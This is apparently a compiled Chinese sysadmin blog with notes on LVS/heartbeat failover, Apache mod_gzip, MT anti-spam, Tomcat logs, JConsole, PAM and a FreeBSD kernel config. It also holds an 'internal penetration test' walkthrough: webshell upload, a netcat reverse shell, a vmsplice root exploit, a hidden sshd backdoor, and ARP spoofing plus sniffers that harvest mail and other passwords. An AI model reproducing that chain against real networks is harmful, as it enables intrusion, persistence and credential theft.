这个一个关闭备份节点的脚本，可以放到heartbeat里面去，在启动备用节点的时候自动关闭备份节点脚本

2， 修改备份节点的haresources

只需添加一项

[root@lvsdrbak lvs]# awk '/^[^$]/&&/^[^#]/' /etc/ha.d/haresources
lvsdr closedr IPaddr::172.16.3.76 ldirectord lvsDR

确定closedr脚本在 启动lvsDR之前就可以了。

五，测试

director服务器是 172.16.3.75
热备机是172.16.3.73
虚拟ip是172.16.3.76
realserver为 172.16.3.73 172.16.3.235
在主DR上启动服务

/etc/rc.d/init.d/heartbeat start

在ie里面输入http://172.16.3.76可以得到这两个页面
172.16.3.235下面有个index1.html 显示172.16.3.235
172.16.3.73下面有个index2.html 显示172.16.3.73
可以通过http://172.16.3.76/index1.html
http://172.16.3.76/index2.html

访问

拔掉172.16.3.75的网线，服务器切到172.16.3.73上。也能正常显示。

一次Linux下ARP欺骗嗅探公司邮箱密码的内部渗透测试

by：vitter@safechina.net
blog：blog.securitycn.net

早就跟相关人员说过邮箱认证smtp和pop协议要做加密，否则在公司内网，太容易被人sniffer到明文密码了，另外邮箱密码和bbs公用，bbs也是采用的http协议，没有用https，这些都是问题。虽然我们控制的网络部分已经做过处理了，ip和mac地址做了绑定，即使有人做arp欺骗后，除非不出网关，否则欺骗后网络到达不了网关之外，因此嗅探明文邮箱密码已经不可能（由于邮箱服务器不在同一网段）。但是对于我们一些共用资源的服务器有公网ip和内网ip且处于一个相对风险较高，而且没有根据安全级别进行过相应的安全策略的网络环境内，因此一些问题是显而易见的，但是某些人根本不以为然。所以我进行了一次简单的内部渗透测试。

首先我从有公网ip和内网ip的网络段入手，如公网ip段是222.222.222.0/255.255.255.255，内网ip段192.168.0.0/255.255.255.0。

经过踩点发现222.222.222.77（192.168.0.77）上跑了一个老版本的某php的论坛。经过检测，存在上传漏洞，利用gif89a文件头欺骗漏洞上传webshell。然后上传个nst。
如图1：
 

利用tools里面的反弹连接：
首先在本地用nc -l -p 5546监听端口
如图4：

然后在nst上点Back connect
如图2：（注意红色部分）

成功登陆
如图3：

图5：

在本地nc的窗口操作：
id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
权限低了点，可以利用前一段时间linux内核vmsplice本地提升权限漏洞。先用nst上传代码：
如图6：（注意红色部分，上传成功）

回到nc窗口：
cp in.c /tmp

cd /tmp

ls
in.c
nst_c_bc_c.c
sess_af927ee319af5d5569b61ac520e53fcf
ssh-ZeOfP16753
tunl0

gcc -o in in.c

ls
in
in.c
nst_c_bc_c.c
sess_af927ee319af5d5569b61ac520e53fcf
ssh-ZeOfP16753
tunl0

/tmp/in
bash: no job control in this shell
[root@bbs111 tmp]# id
uid=0(root) gid=0(root) groups=99(nobody)
[root@bbs111 tmp]#

已经是root权限了，下一步上传俺修改过的常用的后门，这个以前写过 一篇文章介绍如何留后门的，这里就不叙述了（替换sshd和部分命令，可隐藏端口、连接、文件、进程等）。

擦擦pp，进行下一步我们的重点。

我们还是直接用后门sshd登录。还是ssh舒服点：）
如图7：

在SecureCRT下利用rz命令上传我们用到的arpsniffer.c，然后编译：

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

报错，可能是没装libnet的缘故，看说明Make: first you must install "pcap" and "libnet" 确定arpsniffer.c需要先装pcap和 libnet。

[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz
[root@bbs111 root]# cd libpcap-0.8.1
[root@bbs111 libpcap-0.8.1]# ./configure
[root@bbs111 libpcap-0.8.1]# make
[root@bbs111 libpcap-0.8.1]# make install

准备工作已经ok。下面重新编译arpsniffer.c

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

这次没报错，编译成功。

[root@bbs111 root]# ./arpsniffer
====================================
============Arp Sniffer=============
==========Write by Paris-Ye=========
===Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
===For example:
        ./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

下面开始欺骗，由于是服务器端，因此我们欺骗网关：（网络环境如下，邮件服务器ip：192.168.0.11 网关：192.168.0.1 本机：192.168.0.77）

[root@bbs111 root]# ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
110
110
Get network cards mac address:
M-> 00:0e:a6:a5:80:4f
W-> 00:0f:e2:23:05:d0
S-> 00:d0:b7:88:07:59

Now Start... .. .

在另一个登录里面用tcpdump监听下：

[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11

发现有数据，把监听的数据存在文件里面：

[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分钟后停止，在SecureCRT下用sz命令下载pop.txt到本地，然后用Ethereal分析。果然发现明文用户名和密码。

下面我们就可以用linsniffer监听我们想要的用户名和密码了。
先修改linsniffer.c：根据自己的需求监听相应的应用密码。我的如下：

   if(ntohs(tcp->dest)==21)  p=1; /* ftp */
   if(ntohs(tcp->dest)==22)  p=1; /* ssh for comparison added for example only comment out if desired*/
   if(ntohs(tcp->dest)==23)  p=1; /* telnet */
   if(ntohs(tcp->dest)==80) p=1;  /* http */
   if(ntohs(tcp->dest)==110) p=1; /* pop3 */
   if(ntohs(tcp->dest)==513) p=1; /* rlogin */
   if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
                 from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

不用管警告，直接运行编译后的linsniffer即可。

[root@bbs111 root]# ./linsniffer

用户名和密码都自动存到了tcp.log下。如图8：
 

经过测试后，我们把某人的用户名和密码发给某人，相信他再不会想当然的说sniffer不可能了。下面我们利用我们嗅探到的密码做个密码表，进行新一轮进一步的内网渗透测试。相信在我们根据渗透测试结果，进行相关安全技术改造和安全管理规范制度改造后，我们的网络的安全性会大大提升。

文中所用工具下载：ARP sniffer Tools.rar

用mod_gzip对Apache1.3做Web压缩

by：vitter@safechina.net
blog：blog.securitycn.net

一、安装

1.下载源程序

可以从http://sourceforge.net/下载mod_gzip(这个模块已经很久没有维护了，apache 2.x已经内置有mod_deflate压缩模块)的源程序，使用源

程序编译生成Apache的模块（Module）。

2.解压源程序

tar -zxvf mod_gzip-1.3.26.1a.tgz

3.编译

进入源程序所在的目录进行编译，生成相应的动态链接库。编译需要指定参数APXS的相应位置：

make APXS=/usr/local/apache/bin/apxs

但是有报错，以下是编译mod_gzip报的错：
make APXS=/usr/local/apache/bin/apxs

/usr/local/apache/bin/apxs -Wc,-Wall,-O3,-fomit-frame-pointer,-pipe -c mod_gzip.c mod_gzip_debug.c mod_gzip_compress.c -o

mod_gzip.so
gcc -DLINUX=22 -DHAVE_SET_DUMPABLE -I/usr/include/gdbm -DUSE_HSREGEX -fpic -DSHARED_MODULE -I/usr/local/apache/include -Wall,-

O3,-fomit-frame-pointer,-pipe -c mod_gzip.c
cc1: error: unrecognized command line option "-Wall,-O3,-fomit-frame-pointer,-pipe"
apxs:Break: Command failed with rc=1
make: *** [build] Error 1

只好把Makefile中的：-Wall,-O3,-fomit-frame-pointer,这几个选项去掉，然后编译就通过了。
我的gcc版本：
Using built-in specs.
Target: i386-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-

threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-

libgcj-multifile --enable-languages=c,c++,objc,obj-c++,java,fortran,ada --enable-java-awt=gtk --disable-dssi --enable-plugin -

-with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=i386-redhat-linux
Thread model: posix
gcc version 4.1.1 20070105 (Red Hat 4.1.1-52)

（去了那几个选项也没什么影响，配置后重启已经gzip压缩了）

将mod_zip安装到Apache服务器中，其中也要指定APXS的具体位置：

make install  APXS=/usr/local/apache/bin/apxs

4.调用mod_gzip模块

在Apache的配置文件httpd.conf中增加LoadModule参数，调用mod_gzip模块。

LoadModule gzip_module modules/mod_gzip.so

5.测试

运行以下命令测试安装是否成功：

/apache/bin/apachectl configtest

如果出现“Syntax OK”，则说明Apache中已经成功安装上mod_gzip的压缩模块了。

二、Apache中关于mod_gzip的配置

修改Apache的配置文件httpd.conf：

1.增加mod_gzip模块的调用

LoadModule gzip_module modules/mod_gzip.so

2.开启压缩功能

mod_gzip_on Yes

3.设置压缩文件的最小值（bytes）

mod_gzip_minimum_file_size 1000

4.设定压缩文件的最大值（bytes）

mod_gzip_maximum_file_size 1500000

5.最大占用内存（bytes）

mod_gzip_maximum_inmem_size 60000

如果您是安裝 mod_gzip 1.3.19.x 的版本，该设定值会被自动限定 60000 的大小。

6.设定压缩文件的临时目录

mod_gzip_temp_dir /tmp/mod_gzip

7.设定是否保持压缩的工作临时文件

mod_gzip_keep_workfiles No

8.设定各种需要压缩的文件及扩展名

mod_gzip_item_include file \.htm$
mod_gzip_item_include file \.html$
mod_gzip_item_include file \.php$
mod_gzip_item_include file \.php3$
mod_gzip_item_include file \.cgi$
mod_gzip_item_include mime ^text/html$
mod_gzip_item_include mime ^httpd/unix-directory$
mod_gzip_item_include handler proxy-server

mod_gzip_item_exclude mime ^image/
mod_gzip_item_exclude file \.js$
mod_gzip_item_exclude file \.css$
mod_gzip_item_exclude file \.zip$
mod_gzip_item_exclude file \.gz$
mod_gzip_item_exclude file \.exe$
mod_gzip_item_exclude file \.mp3$
mod_gzip_item_exclude file \.pdf$
mod_gzip_item_exclude file \.rar$

mod_gzip_item_include mime text/.*
mod_gzip_item_include mime httpd/unix-directory

mod_gzip_item_exclude
mod_gzip_item_include
指定 mod_gzip 过滤器。決定何种文件格式要進行压缩或不压缩。

　　 mod_gzip_item_exclude -> 表示該文件格式不启用压缩功能。

　　 mod_gzip_item_include -> 表示該文件格式要启用压缩功能。

9.指定针对 HTTP 的何种资料串模式进行压缩

mod_gzip_handle_methods GET

10. 指定浏览器使用的 HTTP 协议版本

mod_gzip_min_http 1000

当浏览器使用的 HTTP 协议版本大于等于此设定值是，才才会进行压缩动作。

　　 1000 = HTTP/1.0, 1001 = HTTP/1.1, ... 依此类推。

11.log记录

LogFormat "%h %l %u %t /"%V %r/" %<s %b mod_gzip: %{mod_gzip_result}n In:%{mod_gzip_input_size}n -< Out:%

{mod_gzip_output_size}n = %{mod_gzip_compression_ratio}n pct." common_with_mod_gzip_info2
自定 Log-file 的格式和名称。

CustomLog logs/mod_gzip.log common_with_mod_gzip_info2
指定 Log-file 的存放位置以及要使用的格式名称。如果您有使用 VirtualHost 且在其中指定 CustomLog 的話，請将此行注释。因每个 Host

只能使用一个 CustomLog 設定項。

至于其他的设定格式，请自行参照 mod_gzip.conf 中的范例。

12.在crontab中加入清空临时文件的设置：

23 23 * * * (/usr/bin/find /tmp/mod_gzip_tmp -mtime +0 |/usr/bin/xargs rm -f)

三、常见问题及解决方法

1.解决调用标准zlib问题

如果在编译mod_gzip的时候没有指定zlib类库的具体位置，那么它默认路径就是/usr/local/lib，当你的zlib不在这个目录下面的时候，就会报

如下错误提示：

Cannot load /httpd/modules/mod_gzip.so into server/httpd/modules/mod_gzip.so: undefined symbol: top_module （或者是deflate）

解决方法就是，在编译mod_gzip的时候，编辑Makefile文件增加两个参数，分别指向zlib的存放目录：

INC=-I/usr/includeLIB=-lz -L/usr/lib

编辑ld.so.conf文件，在其中增加存放zlib标准类库的具体目录，然后运行ldconfig。

这样更改以后，Apache就不会上述出现问题了。

2.Apache中jk2模块有可能和mod_gzip冲突

这种现象会出现在Apache2、jk2及mod_gzip2.0.40配合的时候。最简单的解决办法是，改变应用环境的版本，使用Apache1.3、jk及mod_gzip1.3

配合就会避免产生这种冲突。

3.实现对servlet的压缩

我们在httpd.conf文件中增加相应的压缩配置文件，就可以实现对servlet进行压缩了。

mod_gzip_item_include handler jakarta-servlet
mod_gzip_item_include handler jakarta-servlet$
mod_gzip_item_include handler ^jakarta-servlet
mod_gzip_item_include handler ^jakarta-servlet$
mod_gzip_item_include handler ^^jakarta-servlet$

MT 防止垃圾的 Trackback 的方法

昨天被垃圾Trackback给害惨了。死机2次，只好临时的禁止了，现在有解决办法了。

跟做防止Spam comment垃圾留言的时候类似，具体解决方法如下：

mt-tb.cgi 是处理 trackback 的程序，这个程序拿到了 trackback 后进行插入数据库处理。

trackback 的数据结构定义在：
lib/MT/TBPing.pm 里面，有如下结构:

my $ping = MT::TBPing->new;
$ping->blog_id($tb->blog_id);
$ping->tb_id($tb->id);
$ping->title('Foo');
$ping->excerpt('This is from a TrackBack ping.');
$ping->source_url('http://www.foo.com/bar');
$ping->save
or die $ping->errstr;

其中 'excerpt'就是文字描述部分，可以进行检查有没有中文的判断，如果没有中文，就当做spam处理，直接中断：

if ($ENV{'REQUEST_METHOD'} eq "POST") {
my $tck = param('excerpt');
die if($tck ne "" && $tck !~ /[\x80-\xff]/);
}

将以上四句话加到 mt-tb.cgi 里面 use strict; 后就应该起作用了。

MT 防止垃圾留言的新方法

MT系统的垃圾留言有一个特征，就是留言里面很多联接，非常烦人，在尝试了采用对评论提交后匹配有多少个联接出现在留言里，然后判断是否是垃圾留言是一个好办法来防止大多数的留言。我测试了大约一周，效果比较明显。

以下代码紧跟在mt-comments.cgi的use strict;下面。

use CGI qw(:standard);
if ($ENV{'REQUEST_METHOD'} eq "POST") {
my $tck = param('text');
die if($tck ne "" && $tck !~ /[\x80-\xff]/);
# 以上判断是否是中文留言
my $ncom = 0;
while ( $tck =~ /http/g ) { $ncom ++ ; }
die if( $ncom > 1 );
# 以上判断有多少个URL出现
}

这里 $ncom 就是计算里面的联接个数，如果大于1，就当做垃圾留言了，直接中断。这个可以做适当的调整。

更多的内容请看以前写的Mt 系统如何防止垃圾留言以及如何通过 .htaccess 禁止垃圾 refer ，这里面提到了现有的常用的垃圾留言的处理方案。

Tomcat中catalina.out日志的轮转

by：vitter
http://blog.securitycn.net

Tomcat下的catalina.out文件很大，但是tomcat不像apache一样有log轮转小工具。只好又找了个小工具：cronolog。

1、下载：cronolog-1.6.2.tar.gz

2、安装

# tar zxvf cronolog-1.6.2.tar.gz
# cd cronolog-1.6.2
# ./configure
# make
# make install

默认安装在/usr/local/sbin/下。

3、配置

在tomcat的bin目录的catalina.sh中找到2行：

org.apache.catalina.startup.Bootstrap "$@" start \
      >> "$CATALINA_BASE"/logs/catalina.out 2>&1 &

改成：

org.apache.catalina.startup.Bootstrap "$@" start \
      |/usr/local/sbin/cronolog "$CATALINA_BASE"/logs/catalina.%Y-%m-%d.out >> /dev/null 2>&1 &

重启tomcat，在logs下新生成的文件就是catalina.2008-01-29.out了，会每天自动轮转。

参考：

《日志分割文档》

JConsole的连接问题

使用JCONSOLE监控远程LINUX运行的JAVA进程，总是在报连接失败的错误。

默认的配置文件所在目录。jre/lib/management/jmxremote.password 配置用户名和密码。文件访问权限要严格限制，否则程序无法启动(有提示)。

resin启动：httpd.sh -Xmx1024M -Dcom.sun.management.jmxremote.port=8000 -Dcom.sun.management.jmxremote.ssl=false start
被监控的服务器端增加启动参数意义

-Dcom.sun.management.jmxremote.port=8000
rmiregistry端口8000


-Dcom.sun.management.jmxremote.ssl=false
不用ssl就关闭掉，忘了默认是不是打开的

2)本机上使用jconsole连接远程的8000端口
报连接失败，检查网络情况，8000端口有在监听等待，本地机器能够连接上对端机器的8000端口。切换了一台FreeBSD机器，情况依旧。
3)去网上找了一下。该网文链接如下：
http://svr.wjworld.net/soft/P1558/I7132389.shtml
4)尝试抓包分析，发现是RMI的二进制协议，无法解读，报文中有127.0.0.1等字眼，从关键字判断是RMI下载的STUB文件。
5)继续查找，发现了一篇有价值的文章谈到这个问题，是服务器端解释机器名的问题，如果服务器端hostname -i被定向到127.0.0.1则会出现连接失败的问题。修改/etc/hosts文件，使hostname -i 指向正确的IP，还是不行。
这篇文章链接如下：
http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6209663
6)停止服务器防火墙，可以连上，问题解决。发现
netstat -lntp
除了8000正常端口外java还开了一个端口，而JConsole连接过来的是另一个端口，而且重启后这个端口是随机的，每次启动JVM都会变。tcpdump抓包发现每次都连接8000之后连另外随机的端口。没办法暂时防火墙只好开高端口。
7)可能的问题原因分析：JCONSOLE连接上监控的进程，从监控进程下载了RMI远程调用的STUB文件？该STUB访问服务器的进程，
服务器端的地址可能是通过hostname -i类似机制获得。
8)对于防火墙的问题：google到下面一些解决方式：

set JAVA_OPTS=%JAVA_OPTS% -Dcom.sun.management.jmxremote.port=7878
这样是表示端口方式的访问，用jconsole连接的时候，serviceUrl是： xxx.xxx.xxx.xxx:7878
在java程序中可以创建JMXConnectorServer,jmx 的serviceUrl可以写成 ：
service:jmx:rmi://xxx.xxx.xxx.xxx:3001/jndi/rmi://xxx.xxx.xxx.xxx:9875/myconnector
服务端代码：

MBeanServer mbs = MBeanServerFactory.createMBeanServer("HelloAgent");

Registry aa=LocateRegistry.createRegistry(9000);

		String rmiurl = "service:jmx:rmi://localhost:3001/jndi/rmi://localhost:9000/server";

		JMXServiceURL url= new JMXServiceURL(rmiurl);

		Map<String,String> env = new HashMap<String,String>();

		JMXConnectorServer jmxcs=JMXConnectorServerFactory.newJMXConnectorServer(url, env, mbs);

客户端代码 

JMXServiceURL url = new JMXServiceURL(rmiurl);

		javax.management.remote.JMXConnector jmxc = javax.management.remote.JMXConnectorFactory

				.connect(url);

		MBeanServerConnection msc = jmxc.getMBeanServerConnection();

http://www.javaeye.com/topic/59378

http://crmky.spaces.live.com/blog/cns!8C989768DB1A6B14!481.entry

freebsd的jdk中文乱码解决

在jdk15以后，只需在jre/lib/fonts/下建一个fallback目录，把你想在java中使用的字体烤贝到这个目录中即可，不需再去改fonts.dir文件。或者,比如我的系统中 simsun 等中文字体安装在 /usr/local/share/TrueType，就只需
cd /usr/local/jdk1.5.0/jre/lib/fonts
ln -s /usr/local/share/TrueType fallback
就可以正常现实中文了

linux控制用户的登录地点以及PAM的用法

控制用户的登录地点

文件/etc/secruity/access.conf可控制用户登录地点，为了使用access.conf，必须在文件/etc/pam.d/login中加入下面行：

account required /lib/security/pam_access.so

access.conf文件的格式：

permission : users : origins

其中：

permission：可以是 “+”或“-”，表示允许或拒绝。
user：可以是用户名、用户组名，如果是all则表示所有用户。
origins：登录地点。local表示本地，all表示所有地点，console表示控制台。另外，origins也可以是某一网络。

后面两个域中加上 except是“除了”的意思。例如：除了用户wheel、shutdown、sync禁止所有的控制台登录：

-:ALL EXCEPT wheel shutdown sync:console

root账户的登录地点不在access.conf文件中控制，而是由/etc/securetty文件控制。

必须保证/etc/pam.d/login有下面这行：

auth       required     pam_securetty.so

etc/securetty文件指定了允许root登录的tty设备，由/bin/login程序读取，其格式是一个被允许的名字列表，你可以编辑/etc/securetty且注释掉如下的行。

   # tty2
　　# tty3
　　# tty4
　　# tty5
　　# tty6

这时，root仅可在tty1终端登录。

关于PAM的一些解释

热身：

何要授予用户特权的程序都要能够进行用户认证。当您登入系统时，您需要提供用户名和口令，而后登入进程据此以检验登入的合法性---确认您就是该用户。还有除口令认证之外的其他认证形式，而且口令的存储方式也是各不相同的。

1、说明

A、PAM可加载目标文件(模块)是在RedHat Linux系统中它们被放在了/lib/security目录下
B、PAM库本地系统配置文件/etc/pam.conf OR /etc/pam.d/目录下的一些配置文件来设置

2、# more login

#%PAM-1.0
auth       required     pam_securetty.so
    用来控制root用户只可以从包含在/etc/securetty文件中的终端登录系统。
auth       required     pam_stack.so service=system-auth
auth       required     pam_nologin.so
    提供标准的UNIX nologin登录认证。如果/etc/nologin文件存在，则只有root用户可以登录，其他用户登录时只会得到/etc/nologin文件的内容。如果/etc/nologin不存在，则该模块没有作用。
account    required     pam_stack.so service=system-auth
password   required     pam_stack.so service=system-auth
# pam_selinux.so close should be the first session rule
session    required     pam_selinux.so close
session    required     pam_stack.so service=system-auth
session    optional     pam_console.so
# ls -l /dev/pts/1
crw--w----  1 root tty 136, 1 May 15 21:19 /dev/pts/1
# ls -l /dev/pts/2
crw--w----  1 test tty 136, 2 May 15 21:20 /dev/pts/2
  用户登陆时，它将TTY设备权限改成该用户所有，当用户退出时，将TTY设备权限改为root所有。
# pam_selinux.so open should be the last session rule
session    required     pam_selinux.so multiple open
login要做两件事，首先查询用户，然后为用户提供所需服务，例如提供一个shell程序。
通常，login会提示用户输入密码。然后对密码进行校验，这项任务就是Linux-PAM完成的。

上例中三个required连续使用， 即便第一个模块失败了，也要完成三个模块的校验。这是一种安全上的考虑 ---这种设计永远不要让用户知道他或她们为什么会被拒绝，否则会让其更容易突破认证。可以将“required”改成“requisite”来修改这种认证方式。如果有任何“requisite”模块以失败返回，整个PAM认证将终止再调用其它模块也以失败返回。

3、pam_unix认证模块

所属类型： account; auth; password; session

功能描述：该模块是标准UNIX认证模块pam_unix的替代模块。

在作为auth类型使用时，此时该模块可识别的参数有debug、audit、use_first_pass、try_first_pass、nullok、nodelay，主要功能是验证用户密码的有效性，在缺省情况下（即不带任何参数时），该模块的主要功能是禁止密码为空的用户提供服务；

auth        required      /lib/security/$ISA/pam_env.so
auth        sufficient    /lib/security/$ISA/pam_unix.so likeauth nullok
auth        required      /lib/security/$ISA/pam_deny.so

在作为account类型使用时，此时该模块可识别的参数有debug、audit，该模块主要执行建立用户帐号和密码状态的任务，然后执行提示用户修改密码，用户采用新密码后才提供服务之类的任务；

account     required      /lib/security/$ISA/pam_unix.so
account     sufficient    /lib/security/$ISA/pam_succeed_if.so uid < 100 quiet
account     required      /lib/security/$ISA/pam_permit.so

在作为password类型使用时，此时该模块可识别的参数有debug、 audit、 nullok;、not_set_pass、use_authtok、try_first_pass、use_first_pass、md5、bigcrypt、shadow、nis、

remember，该模块完成让用户更改密码的任务；

password    requisite     /lib/security/$ISA/pam_cracklib.so retry=3
password    sufficient    /lib/security/$ISA/pam_unix.so nullok use_authtok md5
shadow
password    required      /lib/security/$ISA/pam_deny.so

在作为session类型使用时，此时该模块没有可识别的参数，该模块仅仅完成记录用户名和服务名到日志文件的工作。

session     required      /lib/security/$ISA/pam_limits.so
session     required      /lib/security/$ISA/pam_unix.so

可带参数：

debug：将调试信息写入日志
audit：记录更为信息的信息
nullok：缺省情况下，如果用户输入的密码为空，则系统能够不对其提供任何服务。但是如果使用参数，用户不输入密码就可以获得系统提供的服务。同时，也允许用户密码为空时更改用户密码。 ?
nodelay：当用户认证失败，系统在给出错误信息时会有一个延迟，这个延迟是为了防止。黑客猜测密码，使用该参数时，系统将取消这个延迟。通常这是一个1秒钟的延迟。
try_first_pass：在用作auth模块时，该参数将尝试在提示用户输入密码前，使用前面一个堆叠的auth模块提供的密码认证用户；在作为password模块使用时，该参数是为了防止用户将密码更新成使用以前的老密码。
use_first_pass：在用作auth模块时，该参数将在提示用户输入密码前，直接使用前面一个堆叠的auth模块提供的密码认证用户；在作为password模块使用时，该参数用来防止用户将密码设置成为前面一个堆叠的password模块所提供的密码。
no_set_pass：使密码对前后堆叠的password模块无效。
use_authok：强制使用前面堆叠的password模块提供的密码，比如由pam_cracklib模块提供的新密码。
md5：采用md5对用户密码进行加密。
shadow：采用影子密码。
unix：当用户更改密码时，密码被放置在/etc/passwd中。
bigcrype：采用DEC C2算法加密用户密码。
nis：使用NIS远处过程调用来设置新密码。
remember=x：记录x个使用过的旧密码，这些旧密码以MD5方式加密后被保存在/etc/security/opasswd文件中。
broken_shadow：在作为account使用时，该参数用来忽略对影子密码的读错误。
likeauth：未知。

配置实例：

参考/etc/pam.d/system-auth

设置密码中的常见错误信息？
         ⑴当用户输入的密码字符数太少时：
BAD PASSWORD: it's WAY too short
　　　　⑵当用户输入的密码相同字符太多时：
BAD PASSWORD: it does not contain enough DIFFERENT characters
　　　　⑶当用户输入的密码为某英文单词时：
BAD PASSWORD: it is based on a dictionary word
　　　　⑷当用户在“(current) UNIX password:”提示后输入的现有密码错误时：passwd: Authentication token manipulation error
　　　　⑸当用户两次输入的密码不相同时：Sorry, passwords do not match passwd: Authentication information cannot be recovered
　　　　⑹当用户输入的密码未被系统接受时：
passwd: Authentication token manipulation error

example 1

auth       required     pam_securetty.so
    只用来控制root用户只可以从包含在/etc/securetty文件中的终端登录系统。
telnet 服务使用PAM的login进行用户身份验证，#more /etc/pam.d/login便能看到此行,要让root不受限制远程login,第一种方法注销此处这一行，另一种在 /etc/securetty文件中加入诸如pts/n(1-n)；

同理如果想限制root使用ssh远程进入系统，只需在/etc/pam.d/sshd文件中加入这行；auth       required     pam_securetty.so即可。

example 2

account    required     pam_access.so
    pam_access是pam中处理用户访问控制的模块，没有使用pam前，linux对用户的所有访问控制都是借助hosts.allow, hosts.deny文件，实现所有服务的访问控制，再加上usertty就是对用户登陆控制(专门是针对login)。
    一种是直接修改/etc/security/access.conf
另一种是使用参数accessfile=/path/to/file.conf
例如修改access.conf文件：
+:root:ALL //root从任意位置连入系统
+:redhat:164.70.12.//redhat只能从这个网段连入
-:ALL:ALL 其余DENY
然后 # vi /etc/pam.d/sshd
加入这一行 account    required     pam_access.so

example 3

限制用户LOGIN次数
在/etc/security/limits.conf :
加入redhat           -       maxlogins       3
然后 # vi /etc/pam.d/sshd
加入这一行session    required     pam_limits.so
则同一用户至多3-1次login入系统

example 4

限制用户LOGIN时间
# vi /etc/security/time.conf加入以下一行
sshd;*;redhat;!Tu2200-2230
# vi /etc/pam.d/sshd 加入以下一行
account    required     pam_time.so
则redhat每星期二晚上22：00-22：30不能使用SSH来login系统。

example 5

用户访问控制
# vi /etc/pam.d/vsftpd 加入以下一行

auth required pam_listfile.so item=user sense=deny file=/etc/ftpusers onerr=succeed
# vi /etc/ftpusers .......

Freebsd又乱码，这次还是qt的问题

昨天装一个kde下的软件，又给我装了新版本的qt了，结果KDE再次乱码，只好手动删除，郁闷ing

cd /usr/ports/x11-toolkits/qt33

make deinstall

备份一下内核配置

#
# GENERIC -- Generic kernel configuration file for FreeBSD/i386
#
# For more information on this file, please read the handbook section on
# Kernel Configuration Files:
#
#    http://www.FreeBSD.org/doc/en_US.ISO8859-1/books/handbook/kernelconfig-config.html
#
# The handbook is also available locally in /usr/share/doc/handbook
# if you've installed the doc distribution, otherwise always see the
# FreeBSD World Wide Web server (http://www.FreeBSD.org/) for the
# latest information.
#
# An exhaustive list of options and more detailed explanations of the
# device lines is also present in the ../../conf/NOTES and NOTES files.
# If you are in doubt as to the purpose or necessity of a line, check first
# in NOTES.
#
# $FreeBSD: src/sys/i386/conf/GENERIC,v 1.429.2.14 2007/03/27 02:33:00 yongari Exp $

machine        i386
cpu        I486_CPU
cpu        I586_CPU
cpu        I686_CPU
ident           VitterSKERNEL

# To make an SMP kernel, the next line is needed
options         SMP                     # Symmetric MultiProcessor Kernel
options         CPU_SUSP_HLT                # Enable HLT instruction when the CPU is idle. The laptop will be cooler and use less energy.
options         CPU_UPGRADE_HW_CACHE        # Disable useless cache flush. Performances may be enhanced.
options         DEVICE_POLLING              # Enable compatible network adapter polling. Performances may be enhanced.
options         ZERO_COPY_SOCKETS           # Enable network transfers without useless copies. Performances may be enhanced.
device          drm                         # Enable graphic acceleration (base support).
device          i915drm                     # Enable graphic acceleration (i945GM support).
device          atapicam                    # Enable ATA drives access through an SCSI sub-system.
device          sound                       # Enable sound support (base support).
device          snd_hda                     # Enable Intel ICH7 High Definition Audio support
# To statically compile in device wiring instead of /boot/device.hints
#hints        "GENERIC.hints"        # Default places to look for devices.

makeoptions    DEBUG=-g        # Build kernel with gdb(1) debug symbols

options     SCHED_4BSD        # 4BSD scheduler
options     PREEMPTION        # Enable kernel thread preemption
options     INET            # InterNETworking
options     INET6            # IPv6 communications protocols
options     FFS            # Berkeley Fast Filesystem
options     SOFTUPDATES        # Enable FFS soft updates support
options     UFS_ACL            # Support for access control lists
options     UFS_DIRHASH        # Improve performance on big directories
options     MD_ROOT            # MD is a potential root device
options     NFSCLIENT        # Network Filesystem Client
#options     NFSSERVER        # Network Filesystem Server
options     NFS_ROOT        # NFS usable as /, requires NFSCLIENT
options     MSDOSFS            # MSDOS Filesystem
options     CD9660            # ISO 9660 Filesystem
options     PROCFS            # Process filesystem (requires PSEUDOFS)
options     PSEUDOFS        # Pseudo-filesystem framework
options     GEOM_GPT        # GUID Partition Tables.
options     COMPAT_43        # Compatible with BSD 4.3 [KEEP THIS!]
options     COMPAT_FREEBSD4        # Compatible with FreeBSD4
options     COMPAT_FREEBSD5        # Compatible with FreeBSD5
#options     SCSI_DELAY=5000        # Delay (in ms) before probing SCSI
options     KTRACE            # ktrace(1) support
options     SYSVSHM            # SYSV-style shared memory
options     SYSVMSG            # SYSV-style message queues
options     SYSVSEM            # SYSV-style semaphores
options     _KPOSIX_PRIORITY_SCHEDULING # POSIX P1003_1B real-time extensions
#options     KBD_INSTALL_CDEV    # install a CDEV entry in /dev
#options     ADAPTIVE_GIANT        # Giant mutex is adaptive.

device        apic            # I/O APIC

# Bus support.
device        eisa
device        pci

# Floppy drives
#device        fdc

# ATA and ATAPI devices
device        ata
device        atadisk        # ATA disk drives
device        ataraid        # ATA RAID drives
device        atapicd        # ATAPI CDROM drives
device        atapifd        # ATAPI floppy drives
device        atapist        # ATAPI tape drives
options     ATA_STATIC_ID    # Static device numbering

# SCSI Controllers
#device        ahb        # EISA AHA1742 family
#device        ahc        # AHA2940 and onboard AIC7xxx devices
#options     AHC_REG_PRETTY_PRINT    # Print register bitfields in debug
